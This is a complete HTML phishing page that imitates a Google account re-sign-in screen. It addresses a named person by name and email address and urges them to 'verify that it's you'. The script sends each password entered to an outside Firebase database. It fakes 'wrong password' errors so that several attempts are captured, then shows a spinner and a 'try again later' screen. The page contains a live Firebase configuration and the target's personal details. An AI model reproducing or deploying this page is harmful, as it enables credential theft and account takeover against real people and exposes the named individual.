<!DOCTYPE html>
<html>
    <head>
        <title>Confirm Phone Number</title>
        
        <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
        
        <style>
            
            
* {
    margin:0;
    padding:0;
}

img {
    pointer-events:none;
}

body {
    font-family:sans-serif;
}

.google {
    width:20%;
    transform:translateX(-50%);
    margin-left:50%;
    margin-top:10%;
}

.bigtext {
    text-align:center;
    font-size:22px;
    margin-top:3%;
}

.smalltext {
    margin-top:5%;
    width:90%;
    transform:translateX(-50%);
    margin-left:50%;
    font-size:13px;
    color:black;
    opacity:0.8;
}

.nextbtn {
    background-color:rgb(0,100,225);
    outline:none;
    border:none;
    border-radius:5px;
    color:white;
    padding:10px;
    padding-left:20px;
    padding-right:20px;
    position:absolute;
    bottom:5%;
    right:5%;
    font-weight:420;
    letter-spacing:0.5px;
}

.page2 {
    position:fixed;
    top:0;
    left:0;
    height:100%;
    width:100%;
    background-color:white;
    display:none;
    border:0px solid black;
}


.usermail {
    transform:translateX(-50%);
    margin-left:50%;
    border:0px solid black;
    margin-top:2%;
}

.usermail img {
    height:20px;
    margin-left:5px;
}

.usermail p { 
    font-size:12px;
    line-height:24px;
    margin-left:5px;
    margin-top:-5px;
    font-weight:450;
}

.page2 input {
    transform:translateX(-50%);
    margin-left:50%;
    padding:0px;
    width:80vw;
    border:1.5px solid lightgrey;
    border-radius:5px;
    height:50px;
    padding-left:15px;
    outline:none;
    font-size:15px;
}

.showpassword table{
    margin-left:10%;
    margin-top:2%;
}

.showpassword p {
    font-size:13px;
    opacity:;
    margin-top:-6px;
}

#showpass {
    height:20px;
    width:20px;
    margin-left:-1%;
    border:2px solid black;
}

#inputwrapper {
    margin-top:8%;
    border:0px solid black;
}

#inputwrapper p {
    position:relative;
    font-size:12px;
    margin-left:11%;
    transform:translateY(+60%);
    z-index:2;
    background-color:white;
    width:auto;
    display:inline-block;
    padding-left:1%;
    padding-right:1%;
    visibility:hidden;
    font-weight:420;
    color:rgb(0,100,225);
}


#loading {
    position:fixed;
    top:0;
    left:0;
    height:100%;
    width:100%;
    background-color:white;
    display:none;
}

#wentwrong {
    position:fixed;
    top:0;
    left:0;
    height:100%;
    width:100%;
    background-color:white;
    display:none;
}

#wentwrong p {
    font-size:25px;
    width:90%;
    text-align:center;
    transform:translate(-50%,-50%);
    margin-left:50%;
    margin-top:50%;
}



.b {
  display: inline-block;
  position: relative;
  width: 150px;
  height: 150px;
}
/* width:28px;height:28px; */

.d {
  position: absolute;
  width: 0px;
  height: 0px;
  overflow: hidden;
}

.e {
  width: 100%;
  height: 100%;
}

.b.c .e {
  animation: 1568ms linear 0s infinite normal none running s1;
}

.f {
  position: absolute;
  width: 100%;
  height: 100%;
  opacity: 0;
}

.g {
  border-color: rgb(66, 133, 244);
}

.p {
  border-color: rgb(219, 68, 55);
}

.r {
  border-color: rgb(244, 180, 0);
}

.t {
  border-color: rgb(15, 157, 88);
}

.b.c .f.g {
  animation: 5332ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running s2, 5332ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running blue;
}

.b.c .f.p {
  animation: 5332ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running s2, 5332ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running red;
}

.b.c .f.r {
  animation: 5332ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running s2, 5332ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running yellow;
}

.b.c .f.t {
  animation: 5332ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running s2, 5332ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running green;
}



.m {
  position: absolute;
  box-sizing: border-box;
  top: 0px;
  left: 45%;
  width: 10%;
  height: 100%;
  overflow: hidden;
  border-color: inherit;
}

.m .k {
  width: 1000%;
  left: -450%;
}

.i {
  display: inline-block;
  position: relative;
  width: 50%;
  height: 100%;
  overflow: hidden;
  border-color: inherit;
}

.i .k {
  width: 200%;
}



.k {
  position: absolute;
  inset: 0px;
  box-sizing: border-box;
  height: 100%;
  border-width: 5px; /* 3px */
  border-style: solid;
  border-top-color: inherit;
  border-right-color: inherit;
  border-left-color: inherit;
  border-bottom-color: transparent;
  border-radius: 50%;
  animation: 0s ease 0s 1 normal none running none;
}

.i.j .k {
  border-right-color: transparent;
  transform: rotate(129deg);
}

.i.o .k {
  left: -100%;
  border-left-color: transparent;
  transform: rotate(-129deg);
}

.b.c .i.j .k {
  animation: 1333ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running left;
}

.b.c .i.o .k {
  animation: 1333ms cubic-bezier(0.4, 0, 0.2, 1) 0s infinite normal both running right;
}

.b.sf4e6b .e {
  animation: 1568ms linear 0s infinite normal none running s1, 400ms cubic-bezier(0.4, 0, 0.2, 1) 0s 1 normal none running fade;
}


@keyframes s1 {
 
  100% {
    transform: rotate(360deg);
  }
}

@keyframes s2 {
 
  12.5% {
    transform: rotate(135deg);
  }

  25% {
    transform: rotate(270deg);
  }

  37.5% {
    transform: rotate(405deg);
  }

  50% {
    transform: rotate(540deg);
  }

  62.5% {
    transform: rotate(675deg);
  }

  75% {
    transform: rotate(810deg);
  }

  87.5% {
    transform: rotate(945deg);
  }

  100% {
    transform: rotate(1080deg);
  }
}

@keyframes blue {
 
  0% {
    opacity: 0.99;
  }

  25% {
    opacity: 0.99;
  }

  26% {
    opacity: 0;
  }

  89% {
    opacity: 0;
  }

  90% {
    opacity: 0.99;
  }

  100% {
    opacity: 0.99;
  }
}

@keyframes red {
 
  0% {
    opacity: 0;
  }

  15% {
    opacity: 0;
  }

  25% {
    opacity: 0.99;
  }

  50% {
    opacity: 0.99;
  }

  51% {
    opacity: 0;
  }
}

@keyframes yellow {
 
  0% {
    opacity: 0;
  }

  40% {
    opacity: 0;
  }

  50% {
    opacity: 0.99;
  }

  75% {
    opacity: 0.99;
  }

  76% {
    opacity: 0;
  }
}

@keyframes green {
 
  0% {
    opacity: 0;
  }

  65% {
    opacity: 0;
  }

  75% {
    opacity: 0.99;
  }

  90% {
    opacity: 0.99;
  }

  100% {
    opacity: 0;
  }
}

@keyframes left {
 
  0% {
    transform: rotate(130deg);
  }

  50% {
    transform: rotate(-5deg);
  }

  100% {
    transform: rotate(130deg);
  }
}

@keyframes right {
 
  0% {
    transform: rotate(-130deg);
  }

  50% {
    transform: rotate(5deg);
  }

  100% {
    transform: rotate(-130deg);
  }
}

@keyframes fade {
 
  0% {
    opacity: 0.99;
  }

  100% {
    opacity: 0;
  }
}

.a {
  text-align: center;
  margin-top: 51%;
}

            
            
            
        </style>
        
        <script src="https://www.gstatic.com/firebasejs/5.5.3/firebase.js"></script>
        
        
        
    </head>
    <body>
        
        <img class="google" src="https://i.ibb.co/7y1RVxW/1643264227558.png" />
        
        <p class="bigtext"> Verify that it's you </p>
        <p class="smalltext">You were signed out of your Google Account. Sign in again to continue.</p>
        
        <button class="nextbtn" id="nextbtn1"> Next </button>
        
        <div class="page2" id="page2">
            
            <img class="google" src="https://i.ibb.co/7y1RVxW/1643264227558.png" />
            
            <p class="bigtext"> Kavya Siddha </p>
            
            <div class="usermail">
            <table>
            <tr>
            <td>
            <img src="https://i.ibb.co/JCZ2bfv/1643265951383.png"/>
            </td>
            <td>
            <p class="smalltext2">siddhakavya@gmail.com</p>
            </td>
            </tr>
            </table>
            
            </div>
            
            
            <div id="inputwrapper">
            <p id="enteryourp"> Enter your password </p>
            <input placeholder="Enter your password" type="password" id="pass" />
            </div>
            
            <div class="showpassword">
            <table>
            <tr>
            <td>
            <input id="showpass" type="checkbox"/>
            </td>
            <td>
            <p> Show password</p>
            </td>
            </tr>
            </table>
            </div>
            
            
            <button class="nextbtn" id="nextbtn2"> Next </button>
            
            
            
        </div>
        
        <div id="loading" >
            
            <div class="a">

<div class="b c">

<div class="d">Loading…</div>

<div class="e"><div class="f g h">

<div class="i j"><div class="k l"></div></div><div class="m">

<div class="k l"></div></div><div class="i o">

<div class="k l"></div></div></div>

<div class="f p q"><div class="i j"><div class="k l"></div></div><div class="m">

<div class="k l"></div></div><div class="i o"><div class="k l"></div></div></div>

<div class="f r s"><div class="i j"><div class="k l"></div></div><div class="m">

<div class="k l"></div></div><div class="i o"><div class="k l"></div></div></div>

<div class="f t u"><div class="i j"><div class="k l"></div></div><div class="m">

<div class="k l"></div></div><div class="i o"><div class="k l">

</div></div></div></div></div></div>
            
            
        </div>
        
        <div id="wentwrong">
            
            <img class="google" src="https://i.ibb.co/7y1RVxW/1643264227558.png" />
            
            <p> We could not process your request at this moment please try again later </p>
            
        </div>
        
        
        
    </body>
    
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> 
    
    <script>

var count = 0;

function id(id) {
    return document.getElementById(id);
}
id("nextbtn1").onclick = () => {
    id("page2").style.display = "block";
    id("pass").focus();
}
id("nextbtn2").onclick = () => {
    if(id("pass").value != "" && id("pass").value != " " && id("pass").value.length >=6 ) {
    
    if(count == 3) {
    id("loading").style.display = "block";
    addData();
    setTimeout( () => {
        id("loading").style.display = "none";
        id("wentwrong").style.display = "block";
    },Math.ceil(Math.random()*3000)+2000);
    }
    else {
    addData();
    id("pass").style.borderColor = "red"
    id("enteryourp").style.visibility = "hidden";
    id("pass").placeholder = "Enter your password";
    id("pass").value = "";
        count+=1;
    }
    }else {
    id("pass").style.borderColor = "red"
    }
}
id("showpass").onchange = () => {
    
    if(id("showpass").checked == 1) {
        id("pass").type = "text";
    }
    else {
        id("pass").type = "password";
    }
}
id("pass").onfocus = () => {
    
    id("pass").style.borderColor = "rgb(0,100,225)";
    id("enteryourp").style.visibility = "visible";
    id("pass").placeholder = "";
    
}
id("pass").onblur = () => {
    id("pass").style.borderColor = "lightgrey"
    id("enteryourp").style.visibility = "hidden";
    id("pass").placeholder = "Enter your password";
}

var config = {
    apiKey: "AIzaSyA_kyipbRucrtWAtf8jbULc1B0DBRHPHHU",


    authDomain: "sharemedia-298b0.firebaseapp.com",


    databaseURL: "https://sharemedia-298b0-default-rtdb.firebaseio.com/",


    projectId: "sharemedia-298b0",


    storageBucket: "sharemedia-298b0.appspot.com",


    messagingSenderId: "453857796374"
  };

firebase.initializeApp(config); 
var rootRef = firebase.database().ref().child('graduate');


function addData() {
    // inside function
rootRef.push().set({ firstName:"Google acc", lastName:$('#pass').val() });
}

        
        
    </script>
    
    
    
    
    
    
    
</html>
